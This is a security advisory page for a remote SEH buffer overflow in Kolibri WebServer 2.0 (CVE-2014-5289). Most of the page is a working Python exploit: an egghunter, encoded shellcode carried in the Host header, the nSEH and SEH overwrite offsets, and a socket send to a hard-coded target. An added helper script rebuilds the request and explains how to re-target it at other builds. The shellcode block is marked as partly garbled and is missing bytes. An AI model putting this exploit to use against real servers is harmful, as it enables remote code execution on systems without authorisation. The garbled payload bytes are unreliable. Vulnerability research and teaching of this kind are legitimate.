Kolibri WebServer buffer overflow vulnerability (CVE-2014-5289)
Release date:
Updated on:
Affected Systems:
SENKAS Kolibri WebServer 2.0
SENKAS Kolibri WebServer
Description:
Bugtraq id: 69263
CVE (CAN) ID: CVE-2014-5289
Kolibri is a simple HTTP server that serves static Web content; it is licensed under the GPL v3.
Kolibri 2.0 (and possibly other versions) has a remote buffer overflow in the handling of over-long POST requests. The proof of concept below reaches it with an over-long URI in the POST request line, which overwrites the SEH record on the stack. An attacker can exploit this to execute arbitrary code in the context of the affected application.
<* Source: tekwizz123 *>
Test method:
Warning: the following procedure (method) may be offensive and is intended only for security research and teaching. Use it at your own risk!
----------------------------------
#!/bin/python
# Kolibri WebServer 2.0 POST request SEH overflow PoC (source: tekwizz123).
# Python 2 script; byte-string literals are used so that it also runs under Python 3.
import socket

# Payload: egg tag followed by msfvenom output (x86/alpha_mixed encoder):
# [*] x86/alpha_mixed succeeded with size 636 (iteration=1)
#
# NOTE: the encoded payload is reproduced from this page, where extraction
# garbled some bytes (their positions are kept as GARBLED below) and dropped
# others (some lines are short of the 13 bytes per line that msfvenom emits).
# Treat it as illustrative only and regenerate it with msfvenom before use.
GARBLED = b""  # placeholder: one byte here was unreadable on the page

buf  = b"\x45\x44\x44\x43\x45\x44\x44\x43"  # TAG "EDDCEDDC": what the egghunter searches for
buf += b"\x89\xe5\xda\xdd\xd9\x75\xf4\x5f\x57\x59\x49\x49\x49"
buf += b"\x49\x49\x49\x49\x49\x49\x49\x43\x43\x43\x43\x43\x43\x43"
buf += b"\x37\x51\x5a\x6a\x41\x58\x50\x30\x41\x30\x41\x6b\x41"
buf += b"\x41\x51\x32\x41\x42\x32\x42\x42\x30\x42\x42\x41\x42"
buf += b"\x58\x50\x38\x41\x42\x75\x4a\x49\x49\x6c\x69\x78\x6e"
buf += b"\x66\x53\x30\x35\x50\x73\x30\x75\x30\x6d\x59\x4a\x45"
buf += b"\x35\x61\x4e\x32\x33\x54\x6c\x4b\x31\x42\x66\x50\x6c"
buf += b"\x4b\x62\x72\x34\x4c\x6c\x4b\x73\x62\x52\x34\x6e\x6b"
buf += b"\x72\x52\x61\x38\x46\x6f\x6c\x77\x51\x5a\x66\x46\x45"
buf += b"\x61\x59\x6f\x54\x71\x79\x50\x4c\x6c\x75\x6c\x50\x61"
buf += b"\x51\x6c\x65\x52\x34\x6c\x47\x50\x6f\x31\x4a\x6f\x64"
buf += b"\x4d\x57\x71\x6b\x77\x4a\x42\x7a\x50\x36\x32\x71\x47"
buf += b"\x6e\x6b\x56\x32\x36\x4c\x4b\x53\x72\x55\x6c\x4c"
buf += b"\x4b\x50\x4c\x42\x30\x33\x48\x4b\x53\x32\x6a\x56\x61"
buf += b"\x4a\x71\x50\x51\x4c\x4b\x43\x69\x67\x50\x47\x71\x79"
buf += b"\x43\x6c\x4b\x31\x59\x62\x38\x68\x63\x77\x4c\x51\x59"
buf += b"\x6e\x6b\x75\x64\x6c\x4b\x36\x61\x6b\x66\x44\x71\x49"
buf += b"\x6f\x55\x61\x69\x50\x4e\x4c\x4b\x71\x38\x4f\x46\x6d"
buf += b"\x37\x71\x78\x47\x65\x68\x39" + GARBLED + b"\x34\x35\x7a\x54\x47"
buf += b"\x73\x73\x4d\x79\x68\x37\x4b\x33\x4d\x64\x64" + GARBLED + b"\x75"
buf += b"\x6a\x42\x56\x38\x6c\x4b\x72\x78\x75\x74\x53\x31\x4e"
buf += b"\x33\x50\x66\x4c\x4b\x54\x4c\x4b\x4b\x6c\x4b\x36\x38"
buf += b"\x65\x4c\x33\x31\x4e\x33\x4e\x6b\x67\x74\x4c\x4b\x76"
buf += b"\x61\x48\x50\x6f\x79\x71\x54\x51\x34\x34\x64\x43\x6b"
buf += b"\x71\x4b\x73\x51\x53\x69\x32\x7a\x42\x71\x79\x6f\x4d"
buf += b"\x30\x42\x78\x43\x6f\x51\x4a\x6c\x4b\x37\x62\x58\x6b"
buf += b"\x6d\x59\x31\x4d\x45\x38\x33\x74\x72\x63\x30\x67"
buf += GARBLED + b"\x75\x38" + GARBLED + b"\x77\x33\x43\x46\x52\x31\x4f\x42\x74"
buf += b"\x68\x62\x6c\x63\x47\x65\x76\x56\x67\x6b\x4f\x4b"
buf += b"\x65\x6c\x78\x6e" + GARBLED + b"\x76\x61\x45\x50\x37" + GARBLED + b"\x45\x79"
buf += b"\x49\x54\x76\x34" + GARBLED + b"\x50\x65\x38\x76\x49\x4b\x30\x52"
buf += b"\x4b\x45\x50\x49\x6f\x4b\x65\x46\x30\x50\x50" + GARBLED + b"\x50"
buf += b"\x76\x30\x37\x30\x42\x47\x30\x42\x71\x78\x48"
buf += b"\x6a\x76\x6f\x4b\x6f\x49" + GARBLED + b"\x39\x6f\x59\x45\x5a\x37"
buf += b"\x50\x6a\x63\x35\x71\x78\x4f\x30\x6f\x58\x65\x6e\x4f"
buf += b"\x71\x75\x38\x65\x52\x43\x30\x36\x71\x53\x6c\x6c\x49"
buf += b"\x4d\x36\x73\x5a\x44\x50\x43\x66\x43\x67\x32\x48\x6a"
buf += b"\x39\x49\x35\x62\x54\x63\x51\x59\x6f\x78\x55\x4f\x75"
buf += b"\x59\x50\x42\x54\x36\x6c\x6b\x4f\x32\x6e\x65\x58\x72"
buf += b"\x55\x7a\x4c\x30\x68\x38\x58\x35\x6f\x52\x33\x66"
buf += b"\x6b\x4f\x58\x55" + GARBLED + b"\x6a\x35\x50\x72\x4a\x76\x64\x63"
buf += b"\x66\x50\x57\x53\x58\x66\x62\x78\x59\x68\x48\x43\x6f"
buf += b"\x79\x6f\x7a\x75\x6c\x4b\x65\x66\x72\x4a\x73" + GARBLED + b"\x65"
buf += b"\x38\x65\x50\x34\x50\x67" + GARBLED + b"\x37" + GARBLED + b"\x73\x66\x32\x4a"
buf += b"\x43\x30\x55\x38\x43\x68\x4d\x74\x31\x43\x4b\x55\x39"
buf += b"\x6f\x79\x45\x6e\x73\x42\x73\x31\x7a\x75\x50\x32\x76"
buf += b"\x76\x33\x43\x67\x51\x78\x56\x62\x49\x49\x39\x58\x61"
buf += b"\x4f\x69\x6f\x48\x55\x57\x71\x59\x53\x55\x79\x7a\x66"
buf += b"\x4f\x75\x79\x66" + GARBLED + b"\x75\x68\x6c\x4a\x63\x41\x41"

# 32-byte NtAccessCheckAndAuditAlarm egghunter: walks memory looking for the
# doubled tag "EDDCEDDC" and jumps to the bytes that follow it (the payload
# carried in the Host header below).
egghunter  = b"\x66\x81\xca\xff\x0f\x42\x52\x6a\x02\x58\xcd\x2e\x3c\x05\x5a\x74\xef\xb8"
egghunter += b"\x45\x44\x44\x43\x8b\xfa\xaf\x75\xea\xaf\x75\xe7\xff\xe7"

# Request-line payload: 790 bytes of filler ending in the egghunter, then the
# SEH record: nSEH at offset 790, SEH handler at offset 794.
overflow  = b"A" * 12
overflow += b"A" * (790 - len(overflow) - len(egghunter))
overflow += egghunter
overflow += b"\xEB\xD9"  # nSEH: jmp short -0x27, back into the 'A's just before the egghunter.
                         # This offset seems to work against Windows 7 Professional, fully updated as of August 5th, 2014
overflow += b"A" * 2
overflow += b"\x50\x45\x62"  # SEH overwrite 00624550 aka pop ret from the binary itself
                             # (little-endian; only 3 bytes are sent because the top byte of the address is 00).

# A lot of this is the same as exploit 34059 from exploit-db
request  = b"POST /" + overflow + b" HTTP/1.1\r\n"
request += b"User-Agent: Wget/1.13.4\r\n"
request += b"Host: " + buf + b"\r\n"  # egg tag + shellcode travel in the Host header
request += b"Accept: */*\r\n"
request += b"Connection: Keep-Alive\r\n"
request += b"Content-Type: application/x-www-form-urlencoded\r\n"
request += b"Content-Length: 4"
request += b"\r\n"
request += b"licenseID=string&content=string&paramsXML=string"

handle = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
handle.connect(("192.168.62.130", 8080))  # target Kolibri instance
handle.send(request)
handle.close()
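The two mechanics the PoC relies on, the short jump in the nSEH slot and the egghunter's search for the doubled tag, can be checked without a target. The following is an added example written for this page (it is not part of tekwizz123's exploit or the advisory): it rebuilds the same request layout with Python 3 byte strings, derives the "\xEB\xD9" displacement from the offsets instead of hard-coding it, and emulates the hunter's tag search to confirm where the payload would be found. The pop/pop/ret address 0x00624550, the 790-byte offset, the tag "EDDC" and the target address 192.168.62.130 are taken from the PoC above; the 16 NOP bytes stand in for a real payload and are a constructed placeholder.

```python
# Added example for this advisory page, not code from the PoC author or the vendor.
# Rebuilds the PoC's SEH-overflow layout and checks it mechanically:
#  - jmp_short() computes the 2-byte "EB xx" the nSEH slot needs to jump back into
#    the padding in front of the egghunter (the PoC hard-codes 0xD9);
#  - find_egg() emulates what the NtAccessCheckAndAuditAlarm hunter does once it
#    runs: scan for the 4-byte tag twice in a row and continue right after it.
# Constants below are taken from the PoC; the shellcode is a constructed placeholder.
import struct

TAG = b"EDDC"                 # egg the hunter compares against (mov eax, 0x43444445)
SEH_HANDLER = 0x00624550      # pop/pop/ret inside the Kolibri binary (from the PoC)
NSEH_OFFSET = 790             # bytes of request-line data before nSEH is overwritten

# Same 32-byte NtAccessCheckAndAuditAlarm egghunter as the PoC.
EGGHUNTER = (b"\x66\x81\xca\xff\x0f\x42\x52\x6a\x02\x58\xcd\x2e\x3c\x05\x5a\x74\xef"
             b"\xb8" + TAG + b"\x8b\xfa\xaf\x75\xea\xaf\x75\xe7\xff\xe7")


def jmp_short(from_offset, to_offset):
    """Encode 'jmp short' placed at from_offset that lands at to_offset (rel8)."""
    disp = to_offset - (from_offset + 2)      # rel8 is relative to the next instruction
    if not -128 <= disp <= 127:
        raise ValueError("target out of rel8 range: %d" % disp)
    return bytes([0xEB, disp & 0xFF])


def build_overflow(landing_slack=5):
    """Request-line payload: padding, egghunter, nSEH (jmp back), SEH (pop/pop/ret).

    landing_slack: how many bytes before the egghunter the jump lands; those
    bytes are 'A' (inc ecx), a harmless sled into the hunter.
    """
    hunter_offset = NSEH_OFFSET - len(EGGHUNTER)              # 758
    data = b"A" * hunter_offset + EGGHUNTER                   # exactly 790 bytes
    nseh = jmp_short(NSEH_OFFSET, hunter_offset - landing_slack) + b"A" * 2
    seh = struct.pack("<I", SEH_HANDLER).rstrip(b"\x00")      # top byte is 00: send 3 bytes
    return data + nseh + seh


def find_egg(memory, tag=TAG):
    """Emulate the hunter: the tag must occur twice back-to-back; return the
    offset just past the doubled tag (start of the payload), or -1."""
    egg = tag * 2
    i = memory.find(egg)
    return -1 if i < 0 else i + len(egg)


def build_request(shellcode, host="192.168.62.130"):
    """Assemble the POST request as the PoC lays it out: the overflow in the
    request line, the doubled tag plus shellcode in the Host header."""
    overflow = build_overflow()
    return (b"POST /" + overflow + b" HTTP/1.1\r\n"
            + b"User-Agent: Wget/1.13.4\r\n"
            + b"Host: " + TAG * 2 + shellcode + b"\r\n"
            + b"Accept: */*\r\n"
            + b"Connection: Keep-Alive\r\n"
            + b"Content-Type: application/x-www-form-urlencoded\r\n"
            + b"Content-Length: 4\r\n\r\n"
            + b"licenseID=string&content=string&paramsXML=string")


def layout(request):
    """Offsets a debugger would show: egghunter/nSEH/SEH inside the request
    line, where the nSEH jump lands, and where the hunter finds the payload."""
    overflow = request[len(b"POST /"):request.index(b" HTTP/1.1")]
    disp = overflow[NSEH_OFFSET + 1]                          # rel8 byte after 0xEB
    landing = NSEH_OFFSET + 2 + (disp - 256 if disp > 127 else disp)
    return {
        "egghunter": overflow.index(EGGHUNTER),
        "nseh": NSEH_OFFSET,
        "seh": NSEH_OFFSET + 4,
        "jmp_lands_at": landing,
        "payload_at": find_egg(request),
    }


if __name__ == "__main__":
    fake_shellcode = b"\x90" * 16     # constructed placeholder, not a working payload
    req = build_request(fake_shellcode)
    for name, off in layout(req).items():
        print("%-14s %d" % (name, off))
```

Running it prints egghunter 758, nseh 790, seh 794, jmp_lands_at 753 and the offset of the payload in the Host header; jmp_short(790, 753) yields the same "\xEB\xD9" the PoC hard-codes, and the landing offset sits inside the 'A' filler in front of the hunter. Reusing the script against another build of Kolibri means re-measuring NSEH_OFFSET and SEH_HANDLER in a debugger; the jump displacement then follows from the numbers rather than from trial and error.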
Suggestion:
Vendor patch:
SENKAS
------
At the time of writing the vendor has not released a patch or upgrade. Users of this software are advised to follow the vendor's homepage for the latest version:
http://www.senkas.com/kolibri/